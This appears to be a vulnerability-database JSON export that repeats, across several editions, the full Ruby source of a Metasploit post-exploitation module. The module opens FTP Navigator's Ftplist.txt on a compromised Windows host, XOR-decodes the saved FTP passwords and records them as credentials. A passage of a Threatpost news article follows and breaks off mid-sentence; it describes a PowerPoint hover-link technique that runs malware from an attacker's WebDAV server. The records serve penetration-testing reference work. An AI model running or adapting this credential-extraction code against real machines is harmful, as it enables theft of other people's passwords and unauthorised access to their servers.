Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-14T01:37:59", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "42b4d3524402d6e13908603e4f955004", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-26T20:02:16", "history": [], "viewCount": 27, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-11-26T20:02:16"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:77982BF89149D7C3975DF4CBB87E30DF", "THREATPOST:6724191D8602647727AD199739F1B984", "THREATPOST:F0C4F05ACB48323CBE8521DACEF096CC"]}, {"type": "mssecure", "idList": ["MSSECURE:BBFEFD1E8DADE61A9162740FD013A85D"]}, {"type": "redhat", "idList": ["RHSA-2019:3979"]}, {"type": "xen", "idList": ["XSA-306"]}, {"type": "securelist", "idList": ["SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329"]}, {"type": "cve", "idList": ["CVE-2019-14890", "CVE-2019-16001", "CVE-2019-15986", "CVE-2019-15998", "CVE-2019-15284", "CVE-2019-15286", "CVE-2011-3606", "CVE-2019-11290", "CVE-2019-18250", "CVE-2011-3355"]}, {"type": "jvn", "idList": ["JVN:19386781"]}, {"type": "exploitdb", "idList": ["EDB-ID:47717"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E5E0D6F28361F9F8EF1F9976C3ED24DA"]}], "modified": "2019-11-26T20:02:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-26T20:02:16", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-26T21:53:45", "history": [], "viewCount": 32, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-11-26T21:53:45"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:77982BF89149D7C3975DF4CBB87E30DF", "THREATPOST:6724191D8602647727AD199739F1B984", "THREATPOST:F0C4F05ACB48323CBE8521DACEF096CC"]}, {"type": "mssecure", "idList": ["MSSECURE:BBFEFD1E8DADE61A9162740FD013A85D"]}, {"type": "redhat", "idList": ["RHSA-2019:3979"]}, {"type": "xen", "idList": ["XSA-306"]}, {"type": "securelist", "idList": ["SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329"]}, {"type": "cve", "idList": ["CVE-2019-14890", "CVE-2019-16001", "CVE-2019-15986", "CVE-2019-15998", "CVE-2019-15284", "CVE-2019-15286", "CVE-2011-3606", "CVE-2019-11290", "CVE-2019-18250", "CVE-2011-3355"]}, {"type": "jvn", "idList": ["JVN:19386781"]}, {"type": "exploitdb", "idList": ["EDB-ID:47717"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E5E0D6F28361F9F8EF1F9976C3ED24DA"]}], "modified": "2019-11-26T21:53:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-26T21:53:45", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "42b4d3524402d6e13908603e4f955004", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-02-27T23:27:09", "history": [], "viewCount": 34, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2020-02-27T23:27:09"}, "dependencies": {"references": [{"type": "malwarebytes", "idList": ["MALWAREBYTES:6DA75029540C5BCCC14E0BA8AB8CB919"]}, {"type": "securelist", "idList": ["SECURELIST:E57B676439578315D4352DB6723A4CEF"]}, {"type": "cve", "idList": ["CVE-2017-6371", "CVE-2020-3169", "CVE-2019-4596", "CVE-2019-19988", "CVE-2019-19992"]}, {"type": "threatpost", "idList": ["THREATPOST:02217E80905DC2359C84928833EEF42C", "THREATPOST:38EE7EC9B20D31BE39EC3860498CAA71", "THREATPOST:364D360BD92EA8722C2405844896739F"]}, {"type": "virtuozzo", "idList": ["VZA-2020-017"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704635", "OPENVAS:1361412562310892120", "OPENVAS:1361412562310892119", "OPENVAS:1361412562310704633"]}, {"type": "zdt", "idList": ["1337DAY-ID-34027", "1337DAY-ID-34022"]}, {"type": "exploitdb", "idList": ["EDB-ID:48142", "EDB-ID:48138", "EDB-ID:48137"]}], "modified": "2020-02-27T23:27:09"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-27T23:27:09", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-03-01T03:43:46", "history": [], "viewCount": 34, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2020-03-01T03:43:46"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-34031"]}, {"type": "mskb", "idList": ["KB2687455", "KB4504418", "KB4537767", "KB4534251"]}, {"type": "kitploit", "idList": ["KITPLOIT:3152892993583189332"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EF98EB14BAD30B0D70A06F658FBD2BCE"]}, {"type": "cve", "idList": ["CVE-2020-9442", "CVE-2020-3825", "CVE-2020-3868", "CVE-2020-3867"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6DF4E5BA7192EC44AC41AB715066FB60"]}, {"type": "thn", "idList": ["THN:CE7308D018385A331CFB06A31D85CE9C"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A7C754641D40CB640BC64FF4AA3F0317"]}, {"type": "virtuozzo", "idList": ["VZA-2020-017"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892122", "OPENVAS:1361412562310892123", "OPENVAS:1361412562310892121", "OPENVAS:1361412562310704634"]}, {"type": "exploitdb", "idList": ["EDB-ID:48146"]}], "modified": "2020-03-01T03:43:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-01T03:43:46", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-03-02T02:21:02", "history": [], "viewCount": 34, "enchantments": {"score": {"value": 3.1, "vector": "NONE", "modified": "2020-03-02T02:21:02"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-34031"]}, {"type": "mskb", "idList": ["KB2687455", "KB4504418", "KB4537767", "KB4534251"]}, {"type": "kitploit", "idList": ["KITPLOIT:3152892993583189332"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EF98EB14BAD30B0D70A06F658FBD2BCE"]}, {"type": "cve", "idList": ["CVE-2020-9442", "CVE-2020-3825", "CVE-2020-3868", "CVE-2020-3867"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6DF4E5BA7192EC44AC41AB715066FB60"]}, {"type": "thn", "idList": ["THN:CE7308D018385A331CFB06A31D85CE9C"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A7C754641D40CB640BC64FF4AA3F0317"]}, {"type": "virtuozzo", "idList": ["VZA-2020-017"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892122", "OPENVAS:1361412562310892123", "OPENVAS:1361412562310892121", "OPENVAS:1361412562310704634"]}, {"type": "exploitdb", "idList": ["EDB-ID:48146"]}], "modified": "2020-03-02T02:21:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-02T02:21:02", "differentElements": ["sourceData"], "edition": 67}], "viewCount": 36, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2020-03-03T03:06:02"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "THREATPOST:EABA151827AA14E6292386F02B5ED8A1", "THREATPOST:C3442AE98526D8F15A64A54C5272546C"]}, {"type": "mssecure", "idList": ["MSSECURE:4EBFE2D72EFD9AFD0F74EFCBC388ABE0"]}, {"type": "kitploit", "idList": ["KITPLOIT:2034807463336971538"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:7C621480D1DD9279FE1F8EF162A63D46"]}, {"type": "cve", "idList": ["CVE-2020-6799"]}, {"type": "exploitdb", "idList": ["EDB-ID:48152", "EDB-ID:48153", "EDB-ID:48148", "EDB-ID:48147", "EDB-ID:48158", "EDB-ID:48156", "EDB-ID:48155"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156582", "PACKETSTORM:156584", "PACKETSTORM:156589", "PACKETSTORM:156586", "PACKETSTORM:156587"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892131"]}], "modified": "2020-03-03T03:06:02"}, "vulnersScore": 4.2}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"threatpost": [{"lastseen": "2020-04-08T20:55:49", "bulletinFamily": "info", "description": "A researcher is sounding the alarm over what he believes could be a novel attack vector which allows a hacker to manipulate a PowerPoint file to download and begin the installation of malware, simply by hovering over a hypertext link.\n\nThe technique does require a victim to accept one pop-up dialogue box to run or install a program. For those reasons, Microsoft does not consider this a vulnerability. Mandar Satam, independent security researcher, disagrees.\n\n\u201cThe attack is able to bypass the PowerPoint\u2019s restriction of not being able to add a remote file to the HyperLink action, which if we try to add using the GUI, we can\u2019t,\u201d Satam told Threatpost. He added that the dialogue box text containing the filename can be manipulated to show anything, including \u201cWindows Update.bat\u201d or \u201cLoading.. Please Wait.exe.\u201d[](<https://threatpost.com/newsletter-sign/>)Satam, who created a proof-of-concept attack using the technique, said the \u201cweakness\u201d is in PowerPoint\u2019s Open XML Slide Show files, called PPSX. These type of PowerPoint files are designed for presentation playback only, and can\u2019t be edited.\n\n\u201cIn PowerPoint it is possible to set an action on a mouse-over,\u201d he said. In his PoC attack, dubbed \u201cHover with Power,\u201d Satam bypasses previous PowerPoint restrictions implemented by Microsoft in 2017, to [prevent malicious links](<https://threatpost.com/zusy-malware-installs-via-mouseover-no-clicking-required/126122/>) in PowerPoint from installing local executable programs just by hovering over a hypertext link.\n\n\u201cSince that vulnerability was patched, this one is an extension to it where instead of using \u2018Run Program\u2019 action we use \u2018HyperLink To\u2019 action and set it to an \u2018Other file\u2019,\u201d the researcher wrote in a technical [walkthrough of his research](<https://github.com/ethanhunnt/Hover_with_Power/blob/master/README.md>).\n\nBy swapping \u201cRun Program\u201d for \u201cHyperLink To,\u201d the PoC runs the executable from a remote server \u201can attacker-controlled web server with Web Distributed Server (WebDAV) extensions.\u201d This type of server allows remote content editing and reading.\n\n\u201cDue to the way SMB connections work in Windows 10, SMB connections over the internet are possible even if SMB ports (445/139) are closed if a webserver supporting WebDAV extension is hosted by an attacker,\u201d the researcher wrote.\n\nThe Windows Server Message Block (SMB) protocol provides file sharing, network browsing, printing services, and inter-process communication over a network. In the context of Satam\u2019s PoC it circumvents a reliance of a noisy HTTPS request that would likely alert an end user to malicious activity.\n\n\u201cIf an HTTP/HTTPS URL is linked with the (PowerPoint) hyperlink action, then the OS would download the file using a browser on the system at which point Windows Defender/Smartscreen would kick in, indicating that it is an untrusted file; and even if we hit \u2018Run\u2019, it will quarantine the file,\u201d the researcher wrote.\n\nBecause the Hover with Power attack only triggers one pop-up dialogue box \u2013 which can be manipulated by the attacker \u2013 the researcher views this as a vulnerability. However, when he contacted the Microsoft Security Response Center (MSRC), he was told on April 2 that his inquiry would be \u201cclosed\u201d because the attack requires an element of social engineering.\n\n\u201cUnfortunately, your report appears to rely on social engineering to accomplish, 